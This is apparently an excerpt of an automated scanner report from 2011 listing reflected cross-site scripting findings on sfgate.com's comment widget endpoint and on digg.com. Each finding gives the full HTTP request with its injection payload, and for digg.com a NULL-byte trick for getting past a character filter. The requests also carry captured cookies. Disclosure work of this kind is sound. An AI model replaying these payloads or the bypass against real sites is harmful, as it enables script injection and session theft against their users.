GET /ver1.0/sys/jsonp.app?widget_path=pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&plckshortlist=true&plckrefreshpage=true&plckdiscoverysection=Articles&plcksort=ThumbsDescending&plckitemsperpage=10&plckarticleurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_refreshbaseurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_imageserver=http%3A%2F%2Fimgs.sfgate.com&clientUrl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&cb=plcb0u0cabed<script>alert(1)</script>17c242f2f00 HTTP/1.1
Host: contribute.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10; s_vi=[CS]v1|26E409C405161FA3-600001A0A050DABF[CE]; _jsuid=2350901234016438271; __gads=ID=5822a16bcef5d06e:T=1304957833:S=ALNI_MatbnnwpFP284AUG1NDClOmox8VEw; SiteLifeHost=l3vm189l3pluckcom

Response

2.90. http://contribute.sfgate.com/ver1.0/sys/jsonp.app [hdnpluck_imageserver parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contribute.sfgate.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the hdnpluck_imageserver request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d84db"><img%20src%3da%20onerror%3dalert(1)>44c15e0bd86 was submitted in the hdnpluck_imageserver parameter. This input was echoed as d84db"><img src=a onerror=alert(1)>44c15e0bd86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&plckshortlist=true&plckrefreshpage=true&plckdiscoverysection=Articles&plcksort=ThumbsDescending&plckitemsperpage=10&plckarticleurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_refreshbaseurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_imageserver=http%3A%2F%2Fimgs.sfgate.comd84db"><img%20src%3da%20onerror%3dalert(1)>44c15e0bd86&clientUrl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&cb=plcb0u0 HTTP/1.1
Host: contribute.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10; s_vi=[CS]v1|26E409C405161FA3-600001A0A050DABF[CE]; _jsuid=2350901234016438271; __gads=ID=5822a16bcef5d06e:T=1304957833:S=ALNI_MatbnnwpFP284AUG1NDClOmox8VEw; SiteLifeHost=l3vm189l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm189l3pluckcom
Set-Cookie: SiteLifeHost=l3vm189l3pluckcom; domain=sfgate.com; path=/
Set-Cookie: ASP.NET_SessionId=uvmhtu45jkavtpnlx2yf34ea; path=/
Date: Mon, 09 May 2011 16:21:34 GMT
Content-Length: 38453

plcb0u0(' <div id="pluck_comments_1230370" class="pluck-app pluck-comm articlePageCommentBoxWrapper" style="display:none;" onpage="1" itemsperpage="10" sort="ThumbsDescending" filter="" commentOnKey
...[SNIP]...
eshBaseURL="http:\/\/www.sfgate.com\/cgi-bin\/article\/comments\/view?f=\/g\/a\/2011\/05\/08\/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL" HDNPluck_imageServer="http:\/\/imgs.sfgate.comd84db"><img src=a onerror=alert(1)>44c15e0bd86" HDNPluck_gta="">
...[SNIP]...

2.91. http://contribute.sfgate.com/ver1.0/sys/jsonp.app [hdnpluck_refreshbaseurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contribute.sfgate.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the hdnpluck_refreshbaseurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a6f"><img%20src%3da%20onerror%3dalert(1)>5351fd7c03f was submitted in the hdnpluck_refreshbaseurl parameter. This input was echoed as f7a6f"><img src=a onerror=alert(1)>5351fd7c03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&plckshortlist=true&plckrefreshpage=true&plckdiscoverysection=Articles&plcksort=ThumbsDescending&plckitemsperpage=10&plckarticleurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_refreshbaseurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTLf7a6f"><img%20src%3da%20onerror%3dalert(1)>5351fd7c03f&hdnpluck_imageserver=http%3A%2F%2Fimgs.sfgate.com&clientUrl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&cb=plcb0u0 HTTP/1.1
Host: contribute.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10; s_vi=[CS]v1|26E409C405161FA3-600001A0A050DABF[CE]; _jsuid=2350901234016438271; __gads=ID=5822a16bcef5d06e:T=1304957833:S=ALNI_MatbnnwpFP284AUG1NDClOmox8VEw; SiteLifeHost=l3vm189l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm189l3pluckcom
Set-Cookie: SiteLifeHost=l3vm189l3pluckcom; domain=sfgate.com; path=/
Set-Cookie: ASP.NET_SessionId=sc1u1q55gsmsxd55xryzqu55; path=/
Date: Mon, 09 May 2011 16:21:22 GMT
Content-Length: 38177

plcb0u0(' <div id="pluck_comments_1228878" class="pluck-app pluck-comm articlePageCommentBoxWrapper" style="display:none;" onpage="1" itemsperpage="10" sort="ThumbsDescending" filter="" commentOnKey
...[SNIP]...
pagerefresh="true" listtype="full" HDNPluck_refreshBaseURL="http:\/\/www.sfgate.com\/cgi-bin\/article\/comments\/view?f=\/g\/a\/2011\/05\/08\/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTLf7a6f"><img src=a onerror=alert(1)>5351fd7c03f" HDNPluck_imageServer="http:\/\/imgs.sfgate.com" HDNPluck_gta="">
...[SNIP]...

2.92. http://contribute.sfgate.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contribute.sfgate.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7367b"><img%20src%3da%20onerror%3dalert(1)>fd90ea9d4cf was submitted in the plckcommentonkey parameter. This input was echoed as 7367b"><img src=a onerror=alert(1)>fd90ea9d4cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL7367b"><img%20src%3da%20onerror%3dalert(1)>fd90ea9d4cf&plckshortlist=true&plckrefreshpage=true&plckdiscoverysection=Articles&plcksort=ThumbsDescending&plckitemsperpage=10&plckarticleurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_refreshbaseurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_imageserver=http%3A%2F%2Fimgs.sfgate.com&clientUrl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&cb=plcb0u0 HTTP/1.1
Host: contribute.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10; s_vi=[CS]v1|26E409C405161FA3-600001A0A050DABF[CE]; _jsuid=2350901234016438271; __gads=ID=5822a16bcef5d06e:T=1304957833:S=ALNI_MatbnnwpFP284AUG1NDClOmox8VEw; SiteLifeHost=l3vm189l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm189l3pluckcom
Set-Cookie: SiteLifeHost=l3vm189l3pluckcom; domain=sfgate.com; path=/
Set-Cookie: ASP.NET_SessionId=lcifg245l0vred55hd5rhzjz; path=/
Date: Mon, 09 May 2011 16:20:59 GMT
Content-Length: 38177

plcb0u0(' <div id="pluck_comments_1225645" class="pluck-app pluck-comm articlePageCommentBoxWrapper" style="display:none;" onpage="1" itemsperpage="10" sort="ThumbsDescending" filter="" commentOnKey="\/g\/a\/2011\/05\/08\/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL7367b"><img src=a onerror=alert(1)>fd90ea9d4cf" commentOnKeyType="article" pagerefresh="true" listtype="full" HDNPluck_refreshBaseURL="http:\/\/www.sfgate.com\/cgi-bin\/article\/comments\/view?f=\/g\/a\/2011\/05\/08\/bloomberg1376-LKWYZF6S972G01-5
...[SNIP]...

2.93. http://contribute.sfgate.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contribute.sfgate.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e29"><img%20src%3da%20onerror%3dalert(1)>d214d664649 was submitted in the plckcommentonkeytype parameter. This input was echoed as 67e29"><img src=a onerror=alert(1)>d214d664649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=pluck/comments.app&plckcommentonkeytype=article67e29"><img%20src%3da%20onerror%3dalert(1)>d214d664649&plckcommentonkey=%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&plckshortlist=true&plckrefreshpage=true&plckdiscoverysection=Articles&plcksort=ThumbsDescending&plckitemsperpage=10&plckarticleurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_refreshbaseurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_imageserver=http%3A%2F%2Fimgs.sfgate.com&clientUrl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&cb=plcb0u0 HTTP/1.1
Host: contribute.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10; s_vi=[CS]v1|26E409C405161FA3-600001A0A050DABF[CE]; _jsuid=2350901234016438271; __gads=ID=5822a16bcef5d06e:T=1304957833:S=ALNI_MatbnnwpFP284AUG1NDClOmox8VEw; SiteLifeHost=l3vm189l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm189l3pluckcom
Set-Cookie: SiteLifeHost=l3vm189l3pluckcom; domain=sfgate.com; path=/
Set-Cookie: ASP.NET_SessionId=zql3vc45gxwrti55udmisyrs; path=/
Date: Mon, 09 May 2011 16:20:27 GMT
Content-Length: 38380

plcb0u0(' <div id="pluck_comments_1221161" class="pluck-app pluck-comm articlePageCommentBoxWrapper" style="display:none;" onpage="1" itemsperpage="10" sort="ThumbsDescending" filter="" commentOnKey="\/g\/a\/2011\/05\/08\/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL" commentOnKeyType="article67e29"><img src=a onerror=alert(1)>d214d664649" pagerefresh="true" listtype="full" HDNPluck_refreshBaseURL="http:\/\/www.sfgate.com\/cgi-bin\/article\/comments\/view?f=\/g\/a\/2011\/05\/08\/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.D
...[SNIP]...

2.94. http://contribute.sfgate.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contribute.sfgate.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckitemsperpage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5f3e"><img%20src%3da%20onerror%3dalert(1)>f16486b4a30 was submitted in the plckitemsperpage parameter. This input was echoed as b5f3e"><img src=a onerror=alert(1)>f16486b4a30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&plckshortlist=true&plckrefreshpage=true&plckdiscoverysection=Articles&plcksort=ThumbsDescending&plckitemsperpage=10b5f3e"><img%20src%3da%20onerror%3dalert(1)>f16486b4a30&plckarticleurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_refreshbaseurl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle%2Fcomments%2Fview%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&hdnpluck_imageserver=http%3A%2F%2Fimgs.sfgate.com&clientUrl=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&cb=plcb0u0 HTTP/1.1
Host: contribute.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10; s_vi=[CS]v1|26E409C405161FA3-600001A0A050DABF[CE]; _jsuid=2350901234016438271; __gads=ID=5822a16bcef5d06e:T=1304957833:S=ALNI_MatbnnwpFP284AUG1NDClOmox8VEw; SiteLifeHost=l3vm189l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm189l3pluckcom
Set-Cookie: SiteLifeHost=l3vm189l3pluckcom; domain=sfgate.com; path=/
Set-Cookie: ASP.NET_SessionId=alpv04juu4o2jv55djuuxrzk; path=/
Date: Mon, 09 May 2011 16:21:11 GMT
Content-Length: 38177

plcb0u0(' <div id="pluck_comments_1227207" class="pluck-app pluck-comm articlePageCommentBoxWrapper" style="display:none;" onpage="1" itemsperpage="10b5f3e"><img src=a onerror=alert(1)>f16486b4a30" sort="ThumbsDescending" filter="" commentOnKey="\/g\/a\/2011\/05\/08\/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL" commentOnKeyType="article" pagerefresh="true" listtype="full" HDNPlu
...[SNIP]...

2.95. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/img/badges/16x16-digg-guy.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba3d6"><script>alert(1)</script>6f68b39b524 was submitted in the REST URL parameter 1. This input was echoed as ba3d6"><script>alert(1)</script>6f68b39b524 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /img%00ba3d6"><script>alert(1)</script>6f68b39b524/badges/16x16-digg-guy.gif HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 10-May-2011 16:18:03 GMT; path=/; domain=digg.com
X-Digg-Time: D=712568 10.2.128.235
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17185

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/img%00ba3d6"><script>alert(1)</script>6f68b39b524/badges/16x16-digg-guy.gif.rss">
...[SNIP]...

2.96. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/img/badges/16x16-digg-guy.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7709"><script>alert(1)</script>46d514951b4 was submitted in the REST URL parameter 2. This input was echoed as d7709"><script>alert(1)</script>46d514951b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /img/badges%00d7709"><script>alert(1)</script>46d514951b4/16x16-digg-guy.gif HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
